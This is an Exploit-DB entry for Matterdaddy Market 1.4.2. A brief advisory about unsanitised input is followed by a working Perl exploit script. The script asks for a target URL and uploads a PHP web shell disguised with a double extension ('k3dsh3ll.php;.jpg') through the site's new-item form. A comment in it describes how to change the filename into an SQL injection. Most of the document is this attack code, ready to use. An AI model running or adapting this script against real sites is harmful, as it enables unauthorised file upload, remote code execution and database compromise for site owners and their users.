Matterdaddy Market - Multiple Vulnerabilities

EDB-ID:

38524

CVE:

N/A




Platform:

PHP

Date:

2013-05-24


source: https://www.securityfocus.com/bid/60150/info

Matterdaddy Market is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script code, upload arbitrary files, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Matterdaddy Market 1.4.2 is vulnerable; other version may also be affected.

#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
|====================================================|
|=   Matterdaddy Market 1.4.2 File Uploader Fuzzer   |
|=         >> Provided By KedAns-Dz <<               |
|=          e-mail : ked-h[at]hotmail.com            |
|====================================================|
INTRO
print "\n";
print "[!] Enter URL(f.e: http://target.com): ";
    chomp(my $url=<STDIN>);
print "\n";
print "[!] Enter File Path (f.e: C:\\Shell.php;.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php;.gif)
    chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/controller.php?op=newItem',
        Content_Type => 'multipart/form-data',
        Content      =>
            [
        'md_title' => '1337day',
        'md_description' => 'Inj3ct0r Exploit Database',
        'md_price' => '0',
        'md_email2' => 'kedans@pene-test.dz', # put u'r email here !
        'city' => 'Hassi Messaoud',
        'namer' => 'KedAns-Dz',
        'category' => '4',
        'filetoupload' => $file,
    'filename' => 'k3dsh3ll.php;.jpg',
 # to make this exploit as sqli change file name to :
 # k3dsh3ll' [+ SQLi +].php.jpg
 # use temperdata better ;)
        ] );
print "\n";
if($re->is_success) {
    if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; }
    else { print "[!] Check your email and confirm u'r post! \n"; }
} else { print "[-] HTTP request Failed!\n"; }
exit;